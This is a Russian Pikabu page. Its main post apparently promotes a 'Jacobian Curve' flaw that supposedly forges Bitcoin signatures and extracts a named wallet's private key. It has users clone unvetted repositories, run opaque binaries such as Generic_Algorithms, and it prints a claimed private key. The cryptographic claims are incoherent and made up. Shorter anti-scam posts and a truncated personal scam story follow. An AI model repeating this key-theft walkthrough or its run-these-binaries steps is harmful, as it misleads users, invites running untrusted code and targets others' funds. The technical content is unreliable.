Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Регистрируясь, я даю согласие на обработку данных и условия почтовых рассылок.
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Ищите дары леса и готовьте изысканные блюда на лесной ферме с ресторанчиками!

Грибники: дары леса

Фермы, Симуляторы, 2D

Играть

Топ прошлой недели

  • solenakrivetka solenakrivetka 7 постов
  • Animalrescueed Animalrescueed 53 поста
  • ia.panorama ia.panorama 12 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая «Подписаться», я даю согласие на обработку данных и условия почтовых рассылок.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Маркет Промокоды Пятерочка Промокоды Aroma Butik Промокоды Яндекс Путешествия Промокоды Яндекс Еда Постила Футбол сегодня
0 просмотренных постов скрыто
1
CryptoDeepTech
CryptoDeepTech

Манипуляции с координатами кривой Jacobian исследование уязвимости поддельной подписи с помощью декодируемого файла Биткоин Кошелька⁠⁠

1 год назад

CRYPTO DEEP TECH

В данной статье рассмотрим на примере уязвимость, связанная с реализацией кривой Якоби (Jacobian Curve). В последние годы криптовалюты, такие как Биткоин, стали важной частью финансовой экосистемы. Однако с ростом их популярности увеличивается и количество угроз, связанных с кибербезопасностью. Одной из таких угроз является уязвимость алгоритма Jacobian Curve, которая затрагивает алгоритм цифровой подписи эллиптической кривой (ECDSA). Эта уязвимость позволяет злоумышленникам генерировать поддельные подписи, что может привести к серьезным последствиям для пользователей и целостности сети Биткоин.

Jacobian Curve algorithm vulnerability относится к недостаткам в реализации криптографии эллиптических кривых, в частности, затрагивающим ECDSA. Злоумышленники могут манипулировать математическими свойствами координат Якоби, используемых в вычислениях эллиптических кривых, что позволяет им создавать мошеннические транзакции с поддельными подписями, также Jacobian Curve algorithm vulnerability связана с недостатками в реализации криптографии эллиптических кривых, применяемых в ECDSA. Эта уязвимость позволяет злоумышленникам манипулировать математическими свойствами координат Якоби, используемых для генерации цифровых подписей. В результате таких манипуляций злоумышленники могут создавать мошеннические транзакции с поддельными подписями, которые будут приняты системой Биткоин как действительные.

Уязвимость возникает в процессе десериализации данных, который может быть использован для внедрения вредоносного кода и создания ложных подписей. В случае неправильной обработки данных злоумышленники получают возможность подделывать подписи ECDSA, что ставит под угрозу целостность системы Биткоин.

Потенциальные последствия

Основная угроза, связанная с этой уязвимостью, заключается в возможности несанкционированного доступа к средствам пользователей. Злоумышленники могут использовать поддельные подписи для создания транзакций, которые переводят биткоины из кошельков ничего не подозревающих пользователей на свои собственные счета. Это не только подрывает доверие к системе, но и может привести к значительным финансовым потерям для пользователей. Поддельные подписи позволяют злоумышленникам переводить средства с кошельков жертв на свои счета. Более того, такие атаки могут нарушить целостность блокчейна, создавая угрозу двойной траты и разрушая основной принцип работы системы.

Атака «отказ в обслуживании» (DoS) и утечки конфиденциальной информации, включая «приватные ключи пользователей».

Если определенные узлы в сети Биткоин скомпрометированы, это может привести к разветвлению блокчейна на несовместимые цепочки, создавая путаницу и потенциальные проблемы двойной траты. Кроме того, злоумышленники могут использовать эту уязвимость для запуска атак типа «отказ в обслуживании» (DoS), заполняя сеть недействительными транзакциями, что может сделать ее недоступной для законных пользователей.

Успешная эксплуатация этой уязвимости, также может вызвать рассогласование в состоянии консенсуса сети Биткоин, что приведет к разделению цепи блоков на несовместимые ветви. В результате могут возникнуть атаки типа «отказ в обслуживании» (DoS) и утечки конфиденциальной информации, включая приватные ключи пользователей.

Механизмы эксплуатации и влияние на мультиподписи

Уязвимость алгоритма Jacobian Curve особенно опасна для систем, использующих схемы мультиподписи, где для завершения транзакции требуется несколько подписей от разных участников. Злоумышленник может сгенерировать поддельные подписи, которые будут приняты системой, что ставит под угрозу не только отдельные транзакции, но и весь процесс использования мультиподписи.

Как нам стало известно, если входные данные пользователей не проверяются должным образом, это может привести к серьезным сбоям в работе системы Биткоин, где злоумышленник может воспользоваться моментом и внедрить вредоносный код и в конечном итоге манипулировать системой с помощью создание поддельной подписями в транзакций Биткоин.

Практическая часть

Из теории уязвимости алгоритма Jacobian Curve известно, что злоумышленники могут использовать уязвимость для проведения атак DoS, перегружая сеть недействительными транзакциями, что дестабилизирует работу сети Биткоин. Перейдем к практической части статьи и рассмотрим пример с использованием Биткоин кошелька: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 , где были потерянный монеты на сумму: 266.03138481 BTC на август 2024 года эта сумма составляет: 15747770,36 USD

<a href="https://pikabu.ru/story/manipulyatsii_s_koordinatami_krivoy_jacobian_issledovanie_uyazvimosti_poddelnoy_podpisi_s_pomoshchyu_dekodiruemogo_fayla_bitkoin_koshelka_11744906?u=https%3A%2F%2Fexploitdarlenepro.com%2F15gcfqvj68vyuvdb6e3vdu4itktc3htlq2%2F&t=266.03138481%20BTC%20%26gt%3B%2015747770%2C36%20USD&h=d7b4281fba1eb694863458f1343682e58f89d49b" title="https://exploitdarlenepro.com/15gcfqvj68vyuvdb6e3vdu4itktc3htlq2/" target="_blank" rel="nofollow noopener">266.03138481 BTC &gt; 15747770,36 USD</a>

266.03138481 BTC > 15747770,36 USD

Tutorials Power AI

Воспользуемся списком из “Tutorials Power AI” широко применяемая категория искусственного интеллекта для введение бизнеса в различных сферах деятельности криптоанализа и крипографии в целом.

Команда установки:

git clone https://github.com/demining/Tutorials-Power-AI.git cd Tutorials-Power-AI/ python3 tutorials.py

BitcoinChatGPT — это инновационный чат-бот на базе искусственного интеллекта, который помогает пользователям находить уязвимости в транзакциях криптовалюты Bitcoin. Преимущества и классификации BitcoinChatGPT дают возможность проверить ваш адрес Bitcoin на предмет различных схем атак на криптокошельки. Машинное обучение на основе криптоанализа дает нам полную возможность исследовать различные атаки на алгоритмы, используемые в экосистеме Bitcoin. Инструменты для извлечения закрытого ключа из реестра Bitcoin Wallet широко популярны, где BitcoinChatGPT служит важным и полезным ресурсом для кибербезопасности.

Применим уязвимость, связанная с реализацией кривой Якоби (Jacobian Curve) для создания Raw транзакции с помощью процесса машинного обучение BitcoinChatGPT

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/17PN1uHeeGhQFTKRx6s8OS3YftgxNvQzd#scrollTo=2dl8T79mn1YL

Соединим все выданные значение в одну общую строку:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000

Откроем опцию от BlockCypher “Decode A Transaction”:

https://live.blockcypher.com/btc/decodetx/

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

Обратим внимание на Bitcoin HASH160: 334a75f1d3bbefa5b761e5fa53e60bce2a822879

https://github.com/demining/CryptoDeepTools/blob/50de2ffdd7f9f06a34049d1c72559aa16b1bf42c/35JacobianCurve/DecodeRawTX.txt#L31C30-L31C70

Transaction Script

The above script has been decoded

BitcoinChatGPT создает структуру транзакции, используя HASH публичного ключа, где мы видим что Bitcoin address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 отправляет 1234 satoshi на тот же адрес внутри своей сети.

Bitcoin HASH160 был получен с помощью Python Script: wif_to_hash160.py

https://github.com/demining/CryptoDeepTools/blob/main/35JacobianCurve/wif_to_hash160.py

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

https://github.com/demining/CryptoDeepTools/blob/main/35JacobianCurve/KEYFOUND.privkey

BitcoinChatGPT №4 Jacobian Curve Vulnerability Algorithm

Уязвимая Raw транзакция

Создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.g...

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

  • zmq

  • urllib3

  • requests

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и внесем небольшие изменение в коде Python Script: main.py

Запустим команду:

python main.py

Уязвимая транзакция создана!

Откроем файл RawTX в каталоге:

Порядок выполнения действий на видео:

Как нам известно из prompt ответов модуля BitcoinChatGPT Jacobian Curve Vulnerability Algorithm может быть использован для решения сложных криптографических задач.

Smart Transformers

Применим машинное обучение Smart Transformers, интегрируем блокнот Google Colab с Pytorch, TensorFlow, JAX и с помощью полученных данных уязвимой Raw транзакцией для Биткоин Адреса: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 создадим незащищённый файл wallet.dat из предложенного выбора всех существующих алгоритмов от SMART_IDENTIFY. После выполним Padding Oracle Attack на новосозданный файл: wallet.dat для расшифровки пароля в исходный бинарный формат с целью получение и извлечения приватного ключа из программной консоли Bitcoin Core используя при этом стандартную команду: dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Откроем новый блокнот Google Colab по ссылке:

https://colab.research.google.com/#create=true

Клонируем репозиторий Smart Transformers

!git clone https://github.com/smartiden/Smart-Transformers.git

cd Smart-Transformers/

Установим все необходимые пакеты и библиотеки:

!sudo apt-get update !sudo apt install libtool !sudo apt-get install g++ !sudo apt-get install libgmp3-dev libmpfr-dev !chmod +x Generic_Algorithms !./Generic_Algorithms !pip3 install transformers from transformers import AutoModelForCausalLM, AutoTokenizer model_name = "microsoft/DialoGPT-medium" tokenizer = AutoTokenizer.from_pretrained(model_name) model = AutoModelForCausalLM.from_pretrained(model_name) model = model.cpu()

Команда:

ls -S

Добавим нашу уязвимую Raw транзакцию в текстовый документ: RawTX.txt для этого воспользуемся утилитой echo

!cat RawTX.txt

Теперь, чтобы получить точный алгоритм и метод для криптоанализы нам необходимо идентифицировать уязвимый RawTX с помощью утилиты SMART_IDENTIFY.

Запустим команду:

!./SMART_IDENTIFY

В результате мы получаем метод Jacobian_Curve_Algorithm, в ранних исследованиях тоже самое идентифицировал модуль BitcoinChatGPT.

################################################# Jacobian_Curve_Algorithm #################################################

Откроем каталог:

Запустим процесс создание файла wallet.dat для этого используем идентифицированные данные уязвимой Raw транзакции в файле: RawTX.txt для процесса применим утилиту Jacobian_Curve_Algorithm

Запустим команду:

!./Jacobian_Curve_Algorithm -o RawTX.txt -s wallet.dat

Откроем в левой панели Google Colab каталог и видим файл: wallet.dat Успешно создан!

Download and Install Bitcoin Core 0.18.0 https://bitcoincore.org/bin/bitcoin-core-0.18.0

Откроем консоль и запустим команду:

getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Мы видим что файл: wallet.dat принадлежит Биткоин Адресу: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Файл: wallet.dat зашифрован паролем!

Запустим команду для проверки приватного ключа:

dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Мы видим предупреждение: Error: Please enter the wallet passphrase with walletpassphrase first. (code -13)

Padding Oracle Attack

Воспользуемся методом Padding Oracle Attack на Wallet.dat и расшифруем пароль для доступа в бинарный формат пароля.

dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

Private Key Information:

5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP

Bitcoin Address Information:

Balance: 266.03138481 BTC

https://www.coinbase.com/converter/btc/usd

Установим библиотеку Bitcoin

!pip3 install bitcoin

Запустим код для проверки соответствие Биткоин Адреса:

__________________________________________________ Private Key WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP Bitcoin Address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 total_received = 266.03138481 Bitcoin __________________________________________________

Все верно! Приватный ключ соответствует Биткоин Кошельку.

Откроем bitaddress и проверим:

ADDR: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP HEX: C5FBD161D334BA9BBC199BD9A427F05A46AACFABFBB3BC1BFF9D227E418D76D9

Заключение и меры по смягчению угрозы:

Для защиты от угроз, связанных с уязвимостью Jacobian Curve, пользователям необходимо предпринять следующие шаги:

  1. Обновление программного обеспечения: Регулярное обновление криптовалютных кошельков до версий, устраняющих уязвимости, критически важно для обеспечения безопасности.

  2. Улучшение механизмов проверки подписей: Усиленная валидация входных данных и обработка ошибок помогут предотвратить создание поддельных подписей и защитить приватные ключи пользователей.

  3. Мониторинг сетевой активности: Постоянный анализ состояния сети и выявление подозрительных транзакций на ранних этапах позволяют оперативно реагировать на попытки эксплуатации уязвимостей.

  4. Применение многофакторной аутентификации: Внедрение дополнительных криптографических методов защиты значительно повысит безопасность.

Чтобы предотвратить возможные атаки, связанные с уязвимостью Jacobian Curve, пользователям Bitcoin настоятельно рекомендуется обновить программное обеспечение своих кошельков до последних версий, которые устраняют эту уязвимость. Регулярные обновления программного обеспечения, внедрение систем обнаружения аномалий и повышение осведомленности пользователей о возможных угрозах помогут сохранить целостность и безопасность криптовалютных систем.

Уязвимость алгоритма Jacobian Curve представляет собой значительную угрозу для безопасности криптовалютных транзакций и целостности блокчейна. Для минимизации рисков пользователи должны регулярно обновлять программное обеспечение, применять строгие меры безопасности и проводить постоянный мониторинг состояния сети. Эти меры помогут сохранить безопасность и устойчивость криптовалютных систем, защищая пользователей от потенциальных угроз и финансовых потерь.

References:

  1. Jacobians of Curves Abelian Varieties: 10/10/03 notes by W. Stein

  2. Jacobian of special singular curves KUBRA NARI AND ENVER OZDEMIR

  3. On the Jacobian Varieties of Hyperelliptic Curves over Fields of Characteristic p > 2 NORIKO YUI Received October 15, 1977

  4. Jacobian Coordinates on Genus 2 Curves Huseyin Hisil & Craig Costello Yasar University, Izmir, Turkey

  5. Jacobians of Curves of Genus One Harvard University Cambridge, Massachusetts April, 1999

  6. Jacobian curve of singular foliations Nuria Corral Article à paraître, mis en ligne le 3 juillet 2024.

  7. AN ADDITION ALGORITHM ON THE JACOBIAN VARIETIES OF CURVES (FOR APPLICATIONS TO PUBLIC KEY CRYPTOSYSTEM) S. ARITA, S. MIURA, AND T. SEKIGUCHI

  8. THE JACOBIAN AND FORMAL GROUP OF A CURVE OF GENUS 2 OVER AN ARBITRARY GROUND FIELD E. V. Flynn, Mathematical Institute, University of Oxford

  9. On the genus of curves in a Jacobian variety VALERIA ORNELLA MARCUCCI Mathematics Subject Classification (2010)

  10. LOCAL ARITHMETIC OF CURVES AND JACOBIANS P. Allen, F. Calegari, A. Caraiani, T. Gee, D. Helm, B. Le Hung, J. Newton, S. Scholze, R. Taylor, and J. Thorne, Potential automorphy

  11. Compactified Jacobians of nodal curves Lucia Caporaso Expanded notes for a minicourse given at the Istituto Sup

  12. Note on curves in a jacobian Compositio Mathematica, tome 88, no 3 (1993)

  13. Arithmetic on Jacobians of algebraic curves Giulio Di Piazza Damien Robert

  14. From the curve to its Jacobian and back Christophe Ritzenthaler Institut de Mathématiques de Luminy, CNRS Montréal

  15. Generalized Jacobians I Caleb Ji Background from algebraic geometry

  16. Hyperelliptic Curves and their Jacobians Benjamin Smith Isogeny school, online, 2021 Inria + École polytechnique, France

  17. Jacobian curves for normal complex surfaces Fran¸coise Michel Mathematics Subject Classification 2000

  18. THE JACOBIAN OF A RIEMANN SURFACE DONU ARAPURA Arapura, Riemann’s inequality and Riemann-Roch

  19. A curve and its abstract Jacobian Boris Zilber University of Oxford August 22, 2012

  20. Jacobians of Genus One Curves Sang Yook An and Seog Young Kim The University of Arizona

  21. JACOBIANS CURVILINEAR COORDINATES Created by T. Madas

  22. A GEOMETRIC APPROACH TO THE TWO-DIMENSIONAL JACOBIAN CONJECTURE ALEXANDER BORISOV

  23. Jacobian Varieties J.S. Milne June 12, 2021

  24. LOCAL ARITHMETIC OF CURVES AND JACOBIANS School of Mathematics and Statistics, University of Glasgow, University Place, Glasgow

  25. Notes on Jacobian varieties: a brief survey Juliana Coelho (UFF) March 28, 2017

  26. Fast Jacobian arithmetic for hyperelliptic curves of genus 3 Andrew V. Sutherland

  27. The Jacobian of a Transformation Proceedings of the Thirteenth Algorithmic Number Theory Symposium

  28. SEMINAR ON ALGEBRAIC GEOMETRY: “JACOBIANS OF CURVES” Organizers: Peter Scholze, Johannes Anschutz

  29. EQUATIONS FOR THE JACOBIAN OF A HYPERELLIPTIC CURVE PAUL VAN WAMELEN

  30. Comparatively Study of ECC and Jacobian Elliptic Curve Cryptography Anagha P. Zele , Avinash P. Wadhe

  31. THE RANK OF THE JACOBIAN OF MODULAR CURVES: ANALYTIC METHODS BY EMMANUEL KOWALSKI

  32. Space filling curves in their Jacobian Autor Thijs Limbeek Supervisors Prof. Dr. Ben Moonen Dr. Arne Smeets November 24, 2020

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/qf6u85wGwNw

Video tutorial: https://dzen.ru/video/watch/66119078be267c07401d9e4c

Источник: https://cryptodeep.ru/jacobian-curve-algorithm-vulnerability

Показать полностью 20 4
Биткоины Криптовалюта Хакеры Заработок в интернете Заработок Трейдинг Арбитраж криптовалюты Информационная безопасность Чат-бот Финансы Видео YouTube Telegram (ссылка) Яндекс Дзен (ссылка) YouTube (ссылка) Длиннопост
0
5
marselcrypto
marselcrypto
Лига Криптовалют

Защищаемся от скама на бычке⁠⁠

1 год назад
Защищаемся от скама на бычке

На булл-ране криптоэнтузиастам важно сохранять хладнокровие и помнить о безопасности, так как в этот период активизируются скамеры. Вот несколько советов, чтобы защитить свои активы:

➡️ Будьте внимательны к схемам.

Чаще всего скамеры используют:

  • Инвестиционные схемы в BTC.

  • Раг пулы.

  • Фишинг.

  • Инвестиционный скам.

  • Фейковые приложения.

  • Скам через дропы/гивэвеи.

➡️Не переходите по незнакомым ссылкам.

Скамеры создают идентичные оригиналам сайты и аккаунты. Проверяйте адреса и не скачивайте файлы из непроверенных источников.

➡️ Храните сид-фразу в надежном месте.

Лучше использовать защищенный оффлайн-носитель, например, аппаратный кошелек. Не храните сид-фразу в заметках или на фотографиях.

➡️ Создавайте надежные пароли.

Пароль из 12+ символов с буквами верхнего регистра, цифрами и специальными символами значительно сложнее взломать.

➡️ Пользуйтесь надежными кошельками.

90% активов должны храниться в холодных кошельках (Trezor, Ledger, SafePal). Для горячих кошельков выбирайте Rabby.

➡️ Установите двухфакторную аутентификацию.

Это касается всех приложений — от соцсетей до бирж.

➡️ Не устанавливайте расширения из неизвестных источников.

Проверяйте разработчика и загрузчика приложения в магазине Google.

➡️ Тестируйте транзакции.

Перед отправкой крупных сумм отправьте сначала небольшую сумму для проверки.

➡️ Не доверяйте незнакомым пользователям в сети.

Скамеры могут использовать социальную инженерию. Прекращайте общение, если ваш новый знакомый начинает говорить о финансах.

Будьте внимательны не только с активами, но и в соцсетях и чатах, чтобы никто не смог завладеть вашим доверием и использовать его в своих целях.

Больше интересного и полезного контента о криптовалютах и арбитраже в ТГ канале - КриптоМарс

Показать полностью
[моё] Криптовалюта Биткоины Заработок Арбитраж криптовалюты Информационная безопасность Мошенничество Интернет-мошенники Заработок в интернете Финансы Хакеры Инвестиции P2P
1
marselcrypto
marselcrypto
Лига Криптовалют

Тапаем, но осторожно — как скамят игроков Hamster Combat⁠⁠

1 год назад
Тапаем, но осторожно — как скамят игроков Hamster Combat

Наверное все уже слышали про игру Hamster Combat — новый кликер-майнер в Telegram, где игроку предстоит стать директором криптобиржи и зарабатывать игровые очки, которые в будущем, якобы будут конвертированы в токены.

😕 Казалось бы бочка мёда, но есть ложка дёгтя...

По словам разработчиков, в игре уже более 200 миллионов игроков. Напомню, в отце всех кликеров — Notcoin — было всего 35 миллионов, то есть в 5 раз меньше.

Все игроки жаждут листинга — это процесс конвертации игровых очков в токены $HMSTR, которые можно будет продать на бирже и получить реальные деньги.

Пока что листинга токена $HMSTR не было, и следовательно, сейчас обменять свои заработанные очки на деньги невозможно.

Но предприимчивые мошенники предлагают игрокам, посредством рассылки спам-сообщений и рекламы, обменять свое натапанное богатство на настоящие деньги.

⚠️ Два вида скама, которые зафиксировали аналитики F.A.C.C.T.

Первый — злоумышленники предлагают зарегистрироваться в специальном приложении/боте для вывода средств. Для этого нужно привязать кошелек. После привязки срабатывает дрейнер и крадёт все ваши деньги с кошелька.

Второй — скамеры рассылают ссылки на запуск бота. При открытии ссылка ведёт на сторонний веб-ресурс, с очень похожим на Telegram интерфейсом.

На этом поддельном сайте юзеру предлагают ввести свои данные от аккаунта Telegram для входа и активации бота. В итоге, пользователь может потерять свой аккаунт, а вместе с ним и доступ к кошельку Wallet.

⬇️ Расставим все точки на і

Итак, на данный момент обменять свои игоовые очки на настоящие деньги невозможно. Если вы видите такую возможность — проходите мимо, это скам. Следите за информацией о листинге в официальных сетях кликера.

Больше интересного и полезного контента о криптовалютах и арбитраже в ТГ канале - КриптоМарс

Показать полностью
[моё] Арбитраж криптовалюты Заработок Криптовалюта Биткоины Информационная безопасность Заработок в интернете Инвестиции Финансы Трейдинг Хакеры Экономика
20
marselcrypto
marselcrypto
Лига Криптовалют

Как защитить крипту — стримы и дипфейки⁠⁠

1 год назад
Как защитить крипту — стримы и дипфейки

❌ Поддельные стримы

Технологии нейросетей и дипфейков сейчас на высоком уровне, чем и пользуются мошенники. Они запускают стримы на Youtube и Twitch, где «знаменитости» обсуждают крипту и предлагают кое-что купить или куда-то перейти.

Например, недавно на фальшивом YouTube канале Tesla шла трансляция с Илоном Маском. Часть видео была взята с оригинального выступления, а часть — подделана мошенниками.

В конце стрима, «Илон» предложил перейти по QR-коду и подключить свой кошелёк, чтобы получить «подарки». Конечно, ничего юзеры не получили, а наоборот — потеряли десятки тысяч долларов.

Даже на видеохостингах нужно быть внимательным, проверяйте подлинность канала, когда дело касается розыгрышей и инвестиций.

🔍 Дипфейки

Мошенники используют дипфейки не только на стримах, но и на простых видео, в соц. сетях, рекламе, видеозвонках и т.д. Порой, отличить дипфейк от реального человека трудно.

Вот советы для проверки дипфейка:

— Смотрите на глаза и губы. Если глаза странно моргают, а губы расходятся — это дипфейк.

— Если вы на живом стриме или даже звонке, можете задавать вопросы, на которые может ответить только живой человек. Дипфейк быстро раскроется.

— Речь. Один из самых очевидных признаков, роботизированный говор с помехами и странными интонациями — 100% признак подделки.

Больше интересного и полезного контента о криптовалютах и арбитраже в ТГ канале - КриптоМарс

Показать полностью
[моё] Заработок Арбитраж криптовалюты Криптовалюта Биткоины Финансы Информационная безопасность Заработок в интернете Хакеры Биржа Кошелек
2
marselcrypto
marselcrypto
Лига Криптовалют

Илон Маск рекламирует крипто-скам⁠⁠

1 год назад
Илон Маск рекламирует крипто-скам

Недавно пользователь в Твиттере под ником DogeDesigner обнаружил видео, в котором Илон Маск рекламирует крипто-скам.

Да, настоящий Илон Маск рассказывал в кадре о том, что можно с помощью одного сервиса удвоить свой критовалютный депозит. Он предлагал отсканировать qr-код на экране и перейти на сайт, где нужно было внести свои активы. Интересно то, что даже регистрироваться не нужно было — просто перевести свои ETH, BTC или Doge и ждать удвоения прибыли.

Конечно же настоящий Илон не стал бы рекламировать скам. Это видео было создано с помощью ИИ, которое сгенерировало правдоподобную модель миллиардера и его голос.

Таким образом, мошенники пользуются репутацией и авторитетом знаменитостей, так как люди прислушиваются к их мнению, и считают любое сказанное слово громким инсайдом и ищут в этом возможность заработать. Вспомните, как Маск пампил курс Doge только с помощью одного своего твита.

🙂 Не доверяем, проверяем

Неизвестно, сколько людей повелись на эту уловку мошенников. Просто имейте ввиду, что обман может скрываться везде. Анализируйте всю информацию и не делайте поспешных решений, особенно если эти решения связаны с переводом своих денежных средств. Лучше прислушиваться к информации только из официальных источников.

И то, бывает такое что официальные источники взламывают мошенники. Сколько уже было историй, когда аккаунты Твиттер многих крупных крипто-проектов взламывали и от их лица продвигали скам. Сейчас, вроде как все начали пользоваться 2FA, это радует.

Будьте бдительны, и не нужно верить в байки про умножение депозита, даже если об этом говорят знаменитости с хорошей репутацией.

Больше интересного и полезного контента о криптовалютах и арбитраже в ТГ канале - КриптоМарс

Показать полностью
[моё] Арбитраж криптовалюты Заработок Криптовалюта Финансы Биткоины Информационная безопасность Мошенничество Трейдинг Хакеры Негатив
0
6
LuckyAm

Крипто - мошенники в Telegram⁠⁠

1 год назад

Всем желаю доброго времени суток! Пост предназначен для предостережения! Моя история длилась меньше месяца, но запомнится она на всю жизнь. Не за счет негатива и убытка, который я понес, а из за того опыта, который я получил. Которым и хочу поделиться с другими. Дабы они не понесли таких же потерь.

В крпито-индустрию я пришел не от нужды и жажды больших денег, а, скорее, по любопытству. Первые шаги начинались с "кликкеров", "тапалок" и прочих забавных игр на телефоне и пк. Нажимаем пальчиком несколько тысяч раз в день и в вероятном будущем, те монеты, которые вы накопили, будут иметь определенную стоимость на тех или иных торговых платформах. По правде говоря, я и сейчас время от времени занимаюсь подобными операциями. Ведь, надеяться - это нормально.

Постепенно набираясь знаний из интернет ресурсов, различных групп и каналов, я углублялся в сфера криптоиндустрии. Следующим шагом был выход на торговые платформы. Binance, Bybit, Okx и так далее. Спотовая торговля, фьючерсы. Никому не известно куда пойдет цена той или иной монеты, но определенный алгоритм ее движения спрогнозировать можно, разумеется не без риска.

Торговые боты. Этим инструментом я увлекся основательно. Тестировал разные виды, разных производителей. Иногда получалось иногда нет. Начинал, как правило большинство новичков со 100$. Пополнял после падений снова и снова. Пятьдесят центов прибыли в день, доллар или два прибыли в день, конечно же радовали глаз. Периодические сливы -10$ и выше, лишь укрепляли веру и в голове звучала фраза - "Это ведь только начало, ты учишься, это нормально". Были и две серьезные ликвидации на общую сумму 300 долларов. И это действительно было нормально! Однако у большинства из нас есть непомерные амбиции и жажда выгоды. Переломным моментом и является тот факт, когда эти качества берут верх над здравым рассудком и холодным расчетом. Итак, подойдем ближе к сути сего поста.

В один прекрасный день, я, откладывая деньги каждый месяц с зарплаты (она среднестатистическая, ниже 90 тыс. рублей), купил монетку TON следуя своей стратегии и нацелен был на ее рост в ближайшем будущем. Переводя с биржи Bybit на биржу Okx я халатно отнесся к этому процессу. Переводя средства TON в одноименной сети, необходимо добавлять в дополнительное поле "memo" код, который был написан у принимающей стороны. Обратив внимание на сноску рядом с данным полем "необязательно", я ничего не вводя туда перевел средства. Как результат они зависли в блокчейне. Спустя несколько дней я написал письма в поддержку обеих бирж. Мне ответили, что процесс возврата займет продолжительный период времени. В итоге, этот процесс занял у меня несколько недель. Помимо этого я написал в телеграмм группу биржи okx. Мне охотно ответило несколько человек и снабдили парой тройкой советов, как их быстрее оттуда вызволить. Среди них оказался молодой человек ( достоверно, ни пола ,ни возраста я до сих пор не знаю, так как за все время общения голосом мы с ним не общались, а фото, вероятнее всего, не настоящее ), который посоветовал мне завести на счет равную сумму и проделать ту же самую процедуру, но уже с заполнением всех полей. Это, по его словам, подтвердило бы чистоту сделки и средства вернулись бы на мой счет гораздо быстрее. Помимо этого советовали писать в поддержку блокчейн сканеров ( в которых отслеживаются все перемещения монет и все транзакции. 1 - Так я и познакомился с Артёмом К ( ник в телеграмме, на аватарке мультяшная муха или что то вроде того ).

Перешли общаться в личные сообщения в том же телеграмме. Начали с обоюдных общих вопросов о той или иной компетентности в области криптовалютной торговли. Диалоги были не частые, максимум 4-5 предложений в день. По профессии он был наследственным совладельцем фрукто-овощной компании, имел приличный доход и, решивший выбрать инструмент для инвестиций - криптоактивы. Спустя неделю он мне рассказал, что общается с неким "ментором", гуру финансового рынка, который дает ему рекомендации и покупке, продаже и инвестированию. За эти рекомендации он берет свой процент от сделок, который Артем К перечисляет ему каждый месяц. После знакомства с ним очень серьезно преуспел и умножил капитал. Ненавязчиво предложил познакомить с ним и меня. Я же вспомнив свой баланс на бирже, на тот момент, в размере трехсот долларов в разных активах, смутился. Разумеется закралась мысль, какового это будет общаться с человеком, управляющим, (со слов Артема К), исчисляемыми сотнями тысяч долларов, активами со мной. С портфелем в 300 долларов. И зачем я ему такой нужен? Но вторая мысль иного характера проникла в мою голову. "За спрос в глаз не бьют!" Почему бы не послушать. Распознать мошенников можно сразу. К примеру после слов: "Переведите активы под наше оправление и наслаждайтесь своей прибылью..." Однако дальнейших ход событий и характер общения имел абсолютно противоположное направление. Артем К, сказал, что поручится за меня лично, потому, как я хороший человек. он это понял из общения со мной. Подумав, я согласился.

